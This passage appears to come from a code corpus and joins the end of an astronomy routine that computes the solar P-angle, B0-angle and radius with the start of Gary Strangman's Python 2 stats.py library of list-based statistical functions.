l = l + longterm
l = ( l + 2592000.0) % 1296000.0
longmed = l/3600.0
# Allow for Aberration
l = l - 20.5
# Allow for Nutation using the longitude of the Moons mean node OMEGA
omega = 259.183275 - (( 1934.142008 * t ) % 360.0 )
l = l - 17.2 * sin(omega*dtor)
# Form the True Obliquity
oblt = 23.452294 - 0.0130125*t + (9.2*cos(omega*dtor))/3600.0
# Form Right Ascension and Declination
l = l/3600.0
ra = atan2( sin(l*dtor) * cos(oblt*dtor) , cos(l*dtor) ) / dtor
if ra < 0.0:
ra += 360.0
dec = asin(sin(l*dtor) * sin(oblt*dtor)) / dtor
return longmed, ra, dec, l, oblt
def get_pb0r(mjd,arcsec=False):
'''Given a modified Julian date, return the solar P-angle (degrees),
B0-angle (degrees), and solar radius (arcmin, or if arcsec=True,
return solar radius in arcsec)
Translated from SSW (IDL) routine pb0r().
'''
dtor = pi/180.
de = mjd-15019.5 # Parameters defined starting at noon on 1899/12/31.
#;---------------------------------------------------------------------------
#; get the longitude of the sun etc.
#;---------------------------------------------------------------------------
longmed, ra, dec, appl, oblt = sun_pos(de)
#;---------------------------------------------------------------------------
#; form aberrated longitude
#;---------------------------------------------------------------------------
lmbda = longmed - (20.5/3600.0)
#;---------------------------------------------------------------------------
#; form longitude of ascending node of sun's equator on ecliptic
#;---------------------------------------------------------------------------
node = 73.666666 + (50.25/3600.0)*( (de/365.25) + 50.0 )
arg = lmbda - node
#;---------------------------------------------------------------------------
#; calculate P, the position angle of the pole
#;---------------------------------------------------------------------------
p = (atan(-tan(oblt*dtor) * cos(appl*dtor)) +
atan( -0.12722 * cos(arg*dtor))) / dtor
#;---------------------------------------------------------------------------
#; ... and B0 the tilt of the axis
#;---------------------------------------------------------------------------
b = asin( 0.12620 * sin(arg*dtor) ) / dtor
#;---------------------------------------------------------------------------
#; ... and the semi-diameter
#;
#;
#; Form the mean anomalies of Venus(MV),Earth(ME),Mars(MM),Jupiter(MJ)
#; and the mean elongation of the Moon from the Sun(D).
#;
#;---------------------------------------------------------------------------
t = de/36525.0
mv = 212.6 + ( (58517.80 * t) % 360.0 )
me = 358.476 + ( (35999.0498 * t) % 360.0 )
mm = 319.5 + ( (19139.86 * t) % 360.0 )
mj = 225.3 + ( ( 3034.69 * t) % 360.0 )
d = 350.7 + ( (445267.11 * t) % 360.0 )
#;---------------------------------------------------------------------------
#; Form the geocentric distance(r) and semi-diameter(sd)
#;---------------------------------------------------------------------------
r = 1.000141 - (0.016748 - 0.0000418*t)*cos(me*dtor) \
- 0.000140 * cos(2.0*me*dtor) \
+ 0.000016 * cos((58.3 + 2.0*mv - 2.0*me)*dtor) \
+ 0.000005 * cos((209.1 + mv - me)*dtor) \
+ 0.000005 * cos((253.8 - 2.0*mm + 2.0*me)*dtor) \
+ 0.000016 * cos(( 89.5 - mj + me)*dtor) \
+ 0.000009 * cos((357.1 - 2.0*mj + 2.0*me)*dtor) \
+ 0.000031 * cos(d*dtor)
sd = (0.2665685/r)*60.0
if arcsec:
return p, b, sd*60.
return p, b, sd
|
dgary50/eovsa
|
sun_pos.py
|
Python
|
gpl-2.0
| 6,047
|
# Copyright (c) 1999-2002 Gary Strangman; All Rights Reserved.
#
# This software is distributable under the terms of the GNU
# General Public License (GPL) v2, the text of which can be found at
# http://www.gnu.org/copyleft/gpl.html. Installing, importing or otherwise
# using this module constitutes acceptance of the terms of this License.
#
# Disclaimer
#
# This software is provided "as-is". There are no expressed or implied
# warranties of any kind, including, but not limited to, the warranties
# of merchantability and fittness for a given application. In no event
# shall Gary Strangman be liable for any direct, indirect, incidental,
# special, exemplary or consequential damages (including, but not limited
# to, loss of use, data or profits, or business interruption) however
# caused and on any theory of liability, whether in contract, strict
# liability or tort (including negligence or otherwise) arising in any way
# out of the use of this software, even if advised of the possibility of
# such damage.
#
# Comments and/or additions are welcome (send e-mail to:
# strang@nmr.mgh.harvard.edu).
#
"""
stats.py module
(Requires pstat.py module.)
#################################################
####### Written by: Gary Strangman ###########
####### Last modified: May 10, 2002 ###########
#################################################
A collection of basic statistical functions for python. The function
names appear below.
IMPORTANT: There are really *3* sets of functions. The first set has an 'l'
prefix, which can be used with list or tuple arguments. The second set has
an 'a' prefix, which can accept NumPy array arguments. These latter
functions are defined only when NumPy is available on the system. The third
type has NO prefix (i.e., has the name that appears below). Functions of
this set are members of a "Dispatch" class, c/o David Ascher. This class
allows different functions to be called depending on the type of the passed
arguments. Thus, stats.mean is a member of the Dispatch class and
stats.mean(range(20)) will call stats.lmean(range(20)) while
stats.mean(Numeric.arange(20)) will call stats.amean(Numeric.arange(20)).
This is a handy way to keep consistent function names when different
argument types require different functions to be called. Having
implementated the Dispatch class, however, means that to get info on
a given function, you must use the REAL function name ... that is
"print stats.lmean.__doc__" or "print stats.amean.__doc__" work fine,
while "print stats.mean.__doc__" will print the doc for the Dispatch
class. NUMPY FUNCTIONS ('a' prefix) generally have more argument options
but should otherwise be consistent with the corresponding list functions.
Disclaimers: The function list is obviously incomplete and, worse, the
functions are not optimized. All functions have been tested (some more
so than others), but they are far from bulletproof. Thus, as with any
free software, no warranty or guarantee is expressed or implied. :-) A
few extra functions that don't appear in the list below can be found by
interested treasure-hunters. These functions don't necessarily have
both list and array versions but were deemed useful
CENTRAL TENDENCY: geometricmean
harmonicmean
mean
median
medianscore
mode
MOMENTS: moment
variation
skew
kurtosis
skewtest (for Numpy arrays only)
kurtosistest (for Numpy arrays only)
normaltest (for Numpy arrays only)
ALTERED VERSIONS: tmean (for Numpy arrays only)
tvar (for Numpy arrays only)
tmin (for Numpy arrays only)
tmax (for Numpy arrays only)
tstdev (for Numpy arrays only)
tsem (for Numpy arrays only)
describe
FREQUENCY STATS: itemfreq
scoreatpercentile
percentileofscore
histogram
cumfreq
relfreq
VARIABILITY: obrientransform
samplevar
samplestdev
signaltonoise (for Numpy arrays only)
var
stdev
sterr
sem
z
zs
zmap (for Numpy arrays only)
TRIMMING FCNS: threshold (for Numpy arrays only)
trimboth
trim1
round (round all vals to 'n' decimals; Numpy only)
CORRELATION FCNS: covariance (for Numpy arrays only)
correlation (for Numpy arrays only)
paired
pearsonr
spearmanr
pointbiserialr
kendalltau
linregress
INFERENTIAL STATS: ttest_1samp
ttest_ind
ttest_rel
chisquare
ks_2samp
mannwhitneyu
ranksums
wilcoxont
kruskalwallish
friedmanchisquare
PROBABILITY CALCS: chisqprob
erfcc
zprob
ksprob
fprob
betacf
gammln
betai
ANOVA FUNCTIONS: F_oneway
F_value
SUPPORT FUNCTIONS: writecc
incr
sign (for Numpy arrays only)
sum
cumsum
ss
summult
sumdiffsquared
square_of_sums
shellsort
rankdata
outputpairedstats
findwithin
"""
## CHANGE LOG:
## ===========
## 02-11-19 ... fixed attest_ind and attest_rel for div-by-zero Overflows
## 02-05-10 ... fixed lchisqprob indentation (failed when df=even)
## 00-12-28 ... removed aanova() to separate module, fixed licensing to
## match Python License, fixed doc string & imports
## 00-04-13 ... pulled all "global" statements, except from aanova()
## added/fixed lots of documentation, removed io.py dependency
## changed to version 0.5
## 99-11-13 ... added asign() function
## 99-11-01 ... changed version to 0.4 ... enough incremental changes now
## 99-10-25 ... added acovariance and acorrelation functions
## 99-10-10 ... fixed askew/akurtosis to avoid divide-by-zero errors
## added aglm function (crude, but will be improved)
## 99-10-04 ... upgraded acumsum, ass, asummult, asamplevar, avar, etc. to
## all handle lists of 'dimension's and keepdims
## REMOVED ar0, ar2, ar3, ar4 and replaced them with around
## reinserted fixes for abetai to avoid math overflows
## 99-09-05 ... rewrote achisqprob/aerfcc/aksprob/afprob/abetacf/abetai to
## handle multi-dimensional arrays (whew!)
## 99-08-30 ... fixed l/amoment, l/askew, l/akurtosis per D'Agostino (1990)
## added anormaltest per same reference
## re-wrote azprob to calc arrays of probs all at once
## 99-08-22 ... edited attest_ind printing section so arrays could be rounded
## 99-08-19 ... fixed amean and aharmonicmean for non-error(!) overflow on
## short/byte arrays (mean of #s btw 100-300 = -150??)
## 99-08-09 ... fixed asum so that the None case works for Byte arrays
## 99-08-08 ... fixed 7/3 'improvement' to handle t-calcs on N-D arrays
## 99-07-03 ... improved attest_ind, attest_rel (zero-division errortrap)
## 99-06-24 ... fixed bug(?) in attest_ind (n1=a.shape[0])
## 04/11/99 ... added asignaltonoise, athreshold functions, changed all
## max/min in array section to N.maximum/N.minimum,
## fixed square_of_sums to prevent integer overflow
## 04/10/99 ... !!! Changed function name ... sumsquared ==> square_of_sums
## 03/18/99 ... Added ar0, ar2, ar3 and ar4 rounding functions
## 02/28/99 ... Fixed aobrientransform to return an array rather than a list
## 01/15/99 ... Essentially ceased updating list-versions of functions (!!!)
## 01/13/99 ... CHANGED TO VERSION 0.3
## fixed bug in a/lmannwhitneyu p-value calculation
## 12/31/98 ... fixed variable-name bug in ldescribe
## 12/19/98 ... fixed bug in findwithin (fcns needed pstat. prefix)
## 12/16/98 ... changed amedianscore to return float (not array) for 1 score
## 12/14/98 ... added atmin and atmax functions
## removed umath from import line (not needed)
## l/ageometricmean modified to reduce chance of overflows (take
## nth root first, then multiply)
## 12/07/98 ... added __version__variable (now 0.2)
## removed all 'stats.' from anova() fcn
## 12/06/98 ... changed those functions (except shellsort) that altered
## arguments in-place ... cumsum, ranksort, ...
## updated (and fixed some) doc-strings
## 12/01/98 ... added anova() function (requires NumPy)
## incorporated Dispatch class
## 11/12/98 ... added functionality to amean, aharmonicmean, ageometricmean
## added 'asum' function (added functionality to N.add.reduce)
## fixed both moment and amoment (two errors)
## changed name of skewness and askewness to skew and askew
## fixed (a)histogram (which sometimes counted points <lowerlimit)
import pstat # required 3rd party module
import math, string, copy # required python modules
from types import *
__version__ = 0.6
############# DISPATCH CODE ##############
class Dispatch:
"""
The Dispatch class, care of David Ascher, allows different functions to
be called depending on the argument types. This way, there can be one
function name regardless of the argument type. To access function doc
in stats.py module, prefix the function with an 'l' or 'a' for list or
array arguments, respectively. That is, print stats.lmean.__doc__ or
print stats.amean.__doc__ or whatever.
"""
def __init__(self, *tuples):
self._dispatch = {}
for func, types in tuples:
for t in types:
if t in self._dispatch.keys():
raise ValueError, "can't have two dispatches on "+str(t)
self._dispatch[t] = func
self._types = self._dispatch.keys()
def __call__(self, arg1, *args, **kw):
if type(arg1) not in self._types:
raise TypeError, "don't know how to dispatch %s arguments" % type(arg1)
return apply(self._dispatch[type(arg1)], (arg1,) + args, kw)
##########################################################################
######################## LIST-BASED FUNCTIONS ########################
##########################################################################
### Define these regardless
####################################
####### CENTRAL TENDENCY #########
####################################
def lgeometricmean (inlist):
"""
Calculates the geometric mean of the values in the passed list.
That is: n-th root of (x1 * x2 * ... * xn). Assumes a '1D' list.
Usage: lgeometricmean(inlist)
"""
mult = 1.0
one_over_n = 1.0/len(inlist)
for item in inlist:
mult = mult * pow(item,one_over_n)
return mult
def lharmonicmean (inlist):
"""
Calculates the harmonic mean of the values in the passed list.
That is: n / (1/x1 + 1/x2 + ... + 1/xn). Assumes a '1D' list.
Usage: lharmonicmean(inlist)
"""
sum = 0
for item in inlist:
sum = sum + 1.0/item
return len(inlist) / sum
def lmean (inlist):
"""
Returns the arithematic mean of the values in the passed list.
Assumes a '1D' list, but will function on the 1st dim of an array(!).
Usage: lmean(inlist)
"""
sum = 0
for item in inlist:
sum = sum + item
return sum/float(len(inlist))
def lmedian (inlist,numbins=1000):
"""
Returns the computed median value of a list of numbers, given the
number of bins to use for the histogram (more bins brings the computed value
closer to the median score, default number of bins = 1000). See G.W.
Heiman's Basic Stats (1st Edition), or CRC Probability & Statistics.
Usage: lmedian (inlist, numbins=1000)
"""
(hist, smallest, binsize, extras) = histogram(inlist,numbins) # make histog
cumhist = cumsum(hist) # make cumulative histogram
for i in range(len(cumhist)): # get 1st(!) index holding 50%ile score
if cumhist[i]>=len(inlist)/2.0:
cfbin = i
break
LRL = smallest + binsize*cfbin # get lower read limit of that bin
cfbelow = cumhist[cfbin-1]
freq = float(hist[cfbin]) # frequency IN the 50%ile bin
median = LRL + ((len(inlist)/2.0 - cfbelow)/float(freq))*binsize # median formula
return median
def lmedianscore (inlist):
"""
Returns the 'middle' score of the passed list. If there is an even
number of scores, the mean of the 2 middle scores is returned.
Usage: lmedianscore(inlist)
"""
newlist = copy.deepcopy(inlist)
newlist.sort()
if len(newlist) % 2 == 0: # if even number of scores, average middle 2
index = len(newlist)/2 # integer division correct
median = float(newlist[index] + newlist[index-1]) /2
else:
index = len(newlist)/2 # int divsion gives mid value when count from 0
median = newlist[index]
return median
def lmode(inlist):
"""
Returns a list of the modal (most common) score(s) in the passed
list. If there is more than one such score, all are returned. The
bin-count for the mode(s) is also returned.
Usage: lmode(inlist)
Returns: bin-count for mode(s), a list of modal value(s)
"""
scores = pstat.unique(inlist)
scores.sort()
freq = []
for item in scores:
freq.append(inlist.count(item))
maxfreq = max(freq)
mode = []
stillmore = 1
while stillmore:
try:
indx = freq.index(maxfreq)
mode.append(scores[indx])
del freq[indx]
del scores[indx]
except ValueError:
stillmore=0
return maxfreq, mode
####################################
############ MOMENTS #############
####################################
def lmoment(inlist,moment=1):
"""
Calculates the nth moment about the mean for a sample (defaults to
the 1st moment). Used to calculate coefficients of skewness and kurtosis.
Usage: lmoment(inlist,moment=1)
Returns: appropriate moment (r) from ... 1/n * SUM((inlist(i)-mean)**r)
"""
if moment == 1:
return 0.0
else:
mn = mean(inlist)
n = len(inlist)
s = 0
for x in inlist:
s = s + (x-mn)**moment
return s/float(n)
def lvariation(inlist):
"""
Returns the coefficient of variation, as defined in CRC Standard
Probability and Statistics, p.6.
Usage: lvariation(inlist)
"""
return 100.0*samplestdev(inlist)/float(mean(inlist))
def lskew(inlist):
"""
Returns the skewness of a distribution, as defined in Numerical
Recipies (alternate defn in CRC Standard Probability and Statistics, p.6.)
Usage: lskew(inlist)
"""
return moment(inlist,3)/pow(moment(inlist,2),1.5)
def lkurtosis(inlist):
"""
Returns the kurtosis of a distribution, as defined in Numerical
Recipies (alternate defn in CRC Standard Probability and Statistics, p.6.)
Usage: lkurtosis(inlist)
"""
return moment(inlist,4)/pow(moment(inlist,2),2.0)
def ldescribe(inlist):
"""
Returns some descriptive statistics of the passed list (assumed to be 1D).
Usage: ldescribe(inlist)
Returns: n, mean, standard deviation, skew, kurtosis
"""
n = len(inlist)
mm = (min(inlist),max(inlist))
m = mean(inlist)
sd = stdev(inlist)
sk = skew(inlist)
kurt = kurtosis(inlist)
return n, mm, m, sd, sk, kurt
####################################
####### FREQUENCY STATS ##########
####################################
def litemfreq(inlist):
"""
Returns a list of pairs. Each pair consists of one of the scores in inlist
and it's frequency count. Assumes a 1D list is passed.
Usage: litemfreq(inlist)
Returns: a 2D frequency table (col [0:n-1]=scores, col n=frequencies)
"""
scores = pstat.unique(inlist)
scores.sort()
freq = []
for item in scores:
freq.append(inlist.count(item))
return pstat.abut(scores, freq)
def lscoreatpercentile (inlist, percent):
"""
Returns the score at a given percentile relative to the distribution
given by inlist.
Usage: lscoreatpercentile(inlist,percent)
"""
if percent > 1:
print "\nDividing percent>1 by 100 in lscoreatpercentile().\n"
percent = percent / 100.0
targetcf = percent*len(inlist)
h, lrl, binsize, extras = histogram(inlist)
cumhist = cumsum(copy.deepcopy(h))
for i in range(len(cumhist)):
if cumhist[i] >= targetcf:
break
score = binsize * ((targetcf - cumhist[i-1]) / float(h[i])) + (lrl+binsize*i)
return score
def lpercentileofscore (inlist, score,histbins=10,defaultlimits=None):
"""
Returns the percentile value of a score relative to the distribution
given by inlist. Formula depends on the values used to histogram the data(!).
Usage: lpercentileofscore(inlist,score,histbins=10,defaultlimits=None)
"""
h, lrl, binsize, extras = histogram(inlist,histbins,defaultlimits)
cumhist = cumsum(copy.deepcopy(h))
i = int((score - lrl)/float(binsize))
pct = (cumhist[i-1]+((score-(lrl+binsize*i))/float(binsize))*h[i])/float(len(inlist)) * 100
return pct
def lhistogram (inlist,numbins=10,defaultreallimits=None,printextras=0):
"""
Returns (i) a list of histogram bin counts, (ii) the smallest value
of the histogram binning, and (iii) the bin width (the last 2 are not
necessarily integers). Default number of bins is 10. If no sequence object
is given for defaultreallimits, the routine picks (usually non-pretty) bins
spanning all the numbers in the inlist.
Usage: lhistogram (inlist, numbins=10, defaultreallimits=None,suppressoutput=0)
Returns: list of bin values, lowerreallimit, binsize, extrapoints
"""
if (defaultreallimits <> None):
if type(defaultreallimits) not in [ListType,TupleType] or len(defaultreallimits)==1: # only one limit given, assumed to be lower one & upper is calc'd
lowerreallimit = defaultreallimits
upperreallimit = 1.0001 * max(inlist)
else: # assume both limits given
lowerreallimit = defaultreallimits[0]
upperreallimit = defaultreallimits[1]
binsize = (upperreallimit-lowerreallimit)/float(numbins)
else: # no limits given for histogram, both must be calc'd
estbinwidth=(max(inlist)-min(inlist))/float(numbins) + 1 # 1=>cover all
binsize = ((max(inlist)-min(inlist)+estbinwidth))/float(numbins)
lowerreallimit = min(inlist) - binsize/2 #lower real limit,1st bin
bins = [0]*(numbins)
extrapoints = 0
for num in inlist:
try:
if (num-lowerreallimit) < 0:
extrapoints = extrapoints + 1
else:
bintoincrement = int((num-lowerreallimit)/float(binsize))
bins[bintoincrement] = bins[bintoincrement] + 1
except:
extrapoints = extrapoints + 1
if (extrapoints > 0 and printextras == 1):
print '\nPoints outside given histogram range =',extrapoints
return (bins, lowerreallimit, binsize, extrapoints)
def lcumfreq(inlist,numbins=10,defaultreallimits=None):
"""
Returns a cumulative frequency histogram, using the histogram function.
Usage: lcumfreq(inlist,numbins=10,defaultreallimits=None)
Returns: list of cumfreq bin values, lowerreallimit, binsize, extrapoints
"""
h,l,b,e = histogram(inlist,numbins,defaultreallimits)
cumhist = cumsum(copy.deepcopy(h))
return cumhist,l,b,e
def lrelfreq(inlist,numbins=10,defaultreallimits=None):
"""
Returns a relative frequency histogram, using the histogram function.
Usage: lrelfreq(inlist,numbins=10,defaultreallimits=None)
Returns: list of cumfreq bin values, lowerreallimit, binsize, extrapoints
"""
h,l,b,e = histogram(inlist,numbins,defaultreallimits)
for i in range(len(h)):
h[i] = h[i]/float(len(inlist))
return h,l,b,e
####################################
##### VARIABILITY FUNCTIONS ######
####################################
def lobrientransform(*args):
"""
Computes a transform on input data (any number of columns). Used to
test for homogeneity of variance prior to running one-way stats. From
Maxwell and Delaney, p.112.
Usage: lobrientransform(*args)
Returns: transformed data for use in an ANOVA
"""
TINY = 1e-10
k = len(args)
n = [0.0]*k
v = [0.0]*k
m = [0.0]*k
nargs = []
for i in range(k):
nargs.append(copy.deepcopy(args[i]))
n[i] = float(len(nargs[i]))
v[i] = var(nargs[i])
m[i] = mean(nargs[i])
for j in range(k):
for i in range(n[j]):
t1 = (n[j]-1.5)*n[j]*(nargs[j][i]-m[j])**2
t2 = 0.5*v[j]*(n[j]-1.0)
t3 = (n[j]-1.0)*(n[j]-2.0)
nargs[j][i] = (t1-t2) / float(t3)
check = 1
for j in range(k):
if v[j] - mean(nargs[j]) > TINY:
check = 0
if check <> 1:
raise ValueError, 'Problem in obrientransform.'
else:
return nargs
def lsamplevar (inlist):
"""
Returns the variance of the values in the passed list using
N for the denominator (i.e., DESCRIBES the sample variance only).
Usage: lsamplevar(inlist)
"""
n = len(inlist)
mn = mean(inlist)
deviations = []
for item in inlist:
deviations.append(item-mn)
return ss(deviations)/float(n)
def lsamplestdev (inlist):
"""
Returns the standard deviation of the values in the passed list using
N for the denominator (i.e., DESCRIBES the sample stdev only).
Usage: lsamplestdev(inlist)
"""
return math.sqrt(samplevar(inlist))
def lvar (inlist):
"""
Returns the variance of the values in the passed list using N-1
for the denominator (i.e., for estimating population variance).
Usage: lvar(inlist)
"""
n = len(inlist)
mn = mean(inlist)
deviations = [0]*len(inlist)
for i in range(len(inlist)):
deviations[i] = inlist[i] - mn
return ss(deviations)/float(n-1)
def lstdev (inlist):
"""
Returns the standard deviation of the values in the passed list
using N-1 in the denominator (i.e., to estimate population stdev).
Usage: lstdev(inlist)
"""
return math.sqrt(var(inlist))
def lsterr(inlist):
"""
Returns the standard error of the values in the passed list using N-1
in the denominator (i.e., to estimate population standard error).
Usage: lsterr(inlist)
"""
return stdev(inlist) / float(math.sqrt(len(inlist)))
def lsem (inlist):
"""
Returns the estimated standard error of the mean (sx-bar) of the
values in the passed list. sem = stdev / sqrt(n)
Usage: lsem(inlist)
"""
sd = stdev(inlist)
n = len(inlist)
return sd/math.sqrt(n)
def lz (inlist, score):
"""
Returns the z-score for a given input score, given that score and the
list from which that score came. Not appropriate for population calculations.
Usage: lz(inlist, score)
"""
z = (score-mean(inlist))/samplestdev(inlist)
return z
def lzs (inlist):
"""
Returns a list of z-scores, one for each score in the passed list.
Usage: lzs(inlist)
"""
zscores = []
for item in inlist:
zscores.append(z(inlist,item))
return zscores
####################################
####### TRIMMING FUNCTIONS #######
####################################
def ltrimboth (l,proportiontocut):
"""
Slices off the passed proportion of items from BOTH ends of the passed
list (i.e., with proportiontocut=0.1, slices 'leftmost' 10% AND 'rightmost'
10% of scores. Assumes list is sorted by magnitude. Slices off LESS if
proportion results in a non-integer slice index (i.e., conservatively
slices off proportiontocut).
Usage: ltrimboth (l,proportiontocut)
Returns: trimmed version of list l
"""
lowercut = int(proportiontocut*len(l))
uppercut = len(l) - lowercut
return l[lowercut:uppercut]
def ltrim1 (l,proportiontocut,tail='right'):
"""
Slices off the passed proportion of items from ONE end of the passed
list (i.e., if proportiontocut=0.1, slices off 'leftmost' or 'rightmost'
10% of scores). Slices off LESS if proportion results in a non-integer
slice index (i.e., conservatively slices off proportiontocut).
Usage: ltrim1 (l,proportiontocut,tail='right') or set tail='left'
Returns: trimmed version of list l
"""
if tail == 'right':
lowercut = 0
uppercut = len(l) - int(proportiontocut*len(l))
elif tail == 'left':
lowercut = int(proportiontocut*len(l))
uppercut = len(l)
return l[lowercut:uppercut]
####################################
##### CORRELATION FUNCTIONS ######
####################################
def lpaired(x,y):
"""
Interactively determines the type of data and then runs the
appropriated statistic for paired group data.
Usage: lpaired(x,y)
Returns: appropriate statistic name, value, and probability
"""
samples = ''
while samples not in ['i','r','I','R','c','C']:
print '\nIndependent or related samples, or correlation (i,r,c): ',
samples = raw_input()
if samples in ['i','I','r','R']:
print '\nComparing variances ...',
# USE O'BRIEN'S TEST FOR HOMOGENEITY OF VARIANCE, Maxwell & delaney, p.112
r = obrientransform(x,y)
f,p = F_oneway(pstat.colex(r,0),pstat.colex(r,1))
if p<0.05:
vartype='unequal, p='+str(round(p,4))
else:
vartype='equal'
print vartype
if samples in ['i','I']:
if vartype[0]=='e':
t,p = ttest_ind(x,y,0)
print '\nIndependent samples t-test: ', round(t,4),round(p,4)
else:
if len(x)>20 or len(y)>20:
z,p = ranksums(x,y)
print '\nRank Sums test (NONparametric, n>20): ', round(z,4),round(p,4)
else:
u,p = mannwhitneyu(x,y)
print '\nMann-Whitney U-test (NONparametric, ns<20): ', round(u,4),round(p,4)
else: # RELATED SAMPLES
if vartype[0]=='e':
t,p = ttest_rel(x,y,0)
print '\nRelated samples t-test: ', round(t,4),round(p,4)
else:
t,p = ranksums(x,y)
print '\nWilcoxon T-test (NONparametric): ', round(t,4),round(p,4)
else: # CORRELATION ANALYSIS
corrtype = ''
while corrtype not in ['c','C','r','R','d','D']:
print '\nIs the data Continuous, Ranked, or Dichotomous (c,r,d): ',
corrtype = raw_input()
if corrtype in ['c','C']:
m,b,r,p,see = linregress(x,y)
print '\nLinear regression for continuous variables ...'
lol = [['Slope','Intercept','r','Prob','SEestimate'],[round(m,4),round(b,4),round(r,4),round(p,4),round(see,4)]]
pstat.printcc(lol)
elif corrtype in ['r','R']:
r,p = spearmanr(x,y)
print '\nCorrelation for ranked variables ...'
print "Spearman's r: ",round(r,4),round(p,4)
else: # DICHOTOMOUS
r,p = pointbiserialr(x,y)
print '\nAssuming x contains a dichotomous variable ...'
print 'Point Biserial r: ',round(r,4),round(p,4)
print '\n\n'
return None
def lpearsonr(x,y):
"""
Calculates a Pearson correlation coefficient and the associated
probability value. Taken from Heiman's Basic Statistics for the Behav.
Sci (2nd), p.195.
Usage: lpearsonr(x,y) where x and y are equal-length lists
Returns: Pearson's r value, two-tailed p-value
"""
TINY = 1.0e-30
if len(x) <> len(y):
raise ValueError, 'Input values not paired in pearsonr. Aborting.'
n = len(x)
x = map(float,x)
y = map(float,y)
xmean = mean(x)
ymean = mean(y)
r_num = n*(summult(x,y)) - sum(x)*sum(y)
r_den = math.sqrt((n*ss(x) - square_of_sums(x))*(n*ss(y)-square_of_sums(y)))
r = (r_num / r_den) # denominator already a float
df = n-2
t = r*math.sqrt(df/((1.0-r+TINY)*(1.0+r+TINY)))
prob = betai(0.5*df,0.5,df/float(df+t*t))
return r, prob
def lorigin_pearsonr(x,y):
"""
Calculates a Pearson correlation coefficient and the associated
probability value for correlation through the origin. By Dylan Schwilk
Not yet tested.
Usage: lorigin_pearsonr(x,y) where x and y are equal-length lists
Returns: Pearson's r value, two-tailed p-value
"""
TINY = 1.0e-30
if len(x) <> len(y):
raise ValueError, 'Input values not paired in origin_pearsonr. Aborting.'
n = len(x)
x = map(float,x)
y = map(float,y)
xmean = mean(x)
ymean = mean(y)
r_den = math.sqrt(ss(x) * ss(y))
r = summult(x,y) / r_den
df = n-2
t = r*math.sqrt(df/((1.0-r+TINY)*(1.0+r+TINY)))
prob = betai(0.5*df,0.5,df/float(df+t*t))
return r, prob
def lspearmanr(x,y):
"""
Calculates a Spearman rank-order correlation coefficient. Taken
from Heiman's Basic Statistics for the Behav. Sci (1st), p.192.
Usage: lspearmanr(x,y) where x and y are equal-length lists
Returns: Spearman's r, two-tailed p-value
"""
TINY = 1e-30
if len(x) <> len(y):
raise ValueError, 'Input values not paired in spearmanr. Aborting.'
n = len(x)
rankx = rankdata(x)
ranky = rankdata(y)
dsq = sumdiffsquared(rankx,ranky)
rs = 1 - 6*dsq / float(n*(n**2-1))
t = rs * math.sqrt((n-2) / ((rs+1.0)*(1.0-rs)))
df = n-2
probrs = betai(0.5*df,0.5,df/(df+t*t)) # t already a float
# probability values for rs are from part 2 of the spearman function in
# Numerical Recipies, p.510. They are close to tables, but not exact. (?)
return rs, probrs
def lpointbiserialr(x,y):
"""
Calculates a point-biserial correlation coefficient and the associated
probability value. Taken from Heiman's Basic Statistics for the Behav.
Sci (1st), p.194.
Usage: lpointbiserialr(x,y) where x,y are equal-length lists
Returns: Point-biserial r, two-tailed p-value
"""
TINY = 1e-30
if len(x) <> len(y):
raise ValueError, 'INPUT VALUES NOT PAIRED IN pointbiserialr. ABORTING.'
data = pstat.abut(x,y)
categories = pstat.unique(x)
if len(categories) <> 2:
raise ValueError, "Exactly 2 categories required for pointbiserialr()."
else: # there are 2 categories, continue
codemap = pstat.abut(categories,range(2))
recoded = pstat.recode(data,codemap,0)
x = pstat.linexand(data,0,categories[0])
y = pstat.linexand(data,0,categories[1])
xmean = mean(pstat.colex(x,1))
ymean = mean(pstat.colex(y,1))
n = len(data)
adjust = math.sqrt((len(x)/float(n))*(len(y)/float(n)))
rpb = (ymean - xmean)/samplestdev(pstat.colex(data,1))*adjust
df = n-2
t = rpb*math.sqrt(df/((1.0-rpb+TINY)*(1.0+rpb+TINY)))
prob = betai(0.5*df,0.5,df/(df+t*t)) # t already a float
return rpb, prob
def lkendalltau(x,y):
"""
Calculates Kendall's tau ... correlation of ordinal data. Adapted
from function kendl1 in Numerical Recipies. Needs good test-routine.@@@
Usage: lkendalltau(x,y)
Returns: Kendall's tau, two-tailed p-value
"""
n1 = 0
n2 = 0
iss = 0
for j in range(len(x)-1):
for k in range(j,len(y)):
a1 = x[j] - x[k]
a2 = y[j] - y[k]
aa = a1 * a2
if (aa): # neither list has a tie
n1 = n1 + 1
n2 = n2 + 1
if aa > 0:
iss = iss + 1
else:
iss = iss -1
else:
if (a1):
n1 = n1 + 1
else:
n2 = n2 + 1
tau = iss / math.sqrt(n1*n2)
svar = (4.0*len(x)+10.0) / (9.0*len(x)*(len(x)-1))
z = tau / math.sqrt(svar)
prob = erfcc(abs(z)/1.4142136)
return tau, prob
def llinregress(x,y):
"""
Calculates a regression line on x,y pairs.
Usage: llinregress(x,y) x,y are equal-length lists of x-y coordinates
Returns: slope, intercept, r, two-tailed prob, sterr-of-estimate
"""
TINY = 1.0e-20
if len(x) <> len(y):
raise ValueError, 'Input values not paired in linregress. Aborting.'
n = len(x)
x = map(float,x)
y = map(float,y)
xmean = mean(x)
ymean = mean(y)
r_num = float(n*(summult(x,y)) - sum(x)*sum(y))
r_den = math.sqrt((n*ss(x) - square_of_sums(x))*(n*ss(y)-square_of_sums(y)))
r = r_num / r_den
z = 0.5*math.log((1.0+r+TINY)/(1.0-r+TINY))
df = n-2
t = r*math.sqrt(df/((1.0-r+TINY)*(1.0+r+TINY)))
prob = betai(0.5*df,0.5,df/(df+t*t))
slope = r_num / float(n*ss(x) - square_of_sums(x))
intercept = ymean - slope*xmean
sterrest = math.sqrt(1-r*r)*samplestdev(y)
return slope, intercept, r, prob, sterrest
####################################
##### INFERENTIAL STATISTICS #####
####################################
def lttest_1samp(a,popmean,printit=0,name='Sample',writemode='a'):
"""
Calculates the t-obtained for the independent samples T-test on ONE group
of scores a, given a population mean. If printit=1, results are printed
to the screen. If printit='filename', the results are output to 'filename'
using the given writemode (default=append). Returns t-value, and prob.
Usage: lttest_1samp(a,popmean,Name='Sample',printit=0,writemode='a')
Returns: t-value, two-tailed prob
"""
x = mean(a)
v = var(a)
n = len(a)
df = n-1
svar = ((n-1)*v)/float(df)
t = (x-popmean)/math.sqrt(svar*(1.0/n))
prob = betai(0.5*df,0.5,float(df)/(df+t*t))
if printit <> 0:
statname = 'Single-sample T-test.'
outputpairedstats(printit,writemode,
'Population','--',popmean,0,0,0,
name,n,x,v,min(a),max(a),
statname,t,prob)
return t,prob
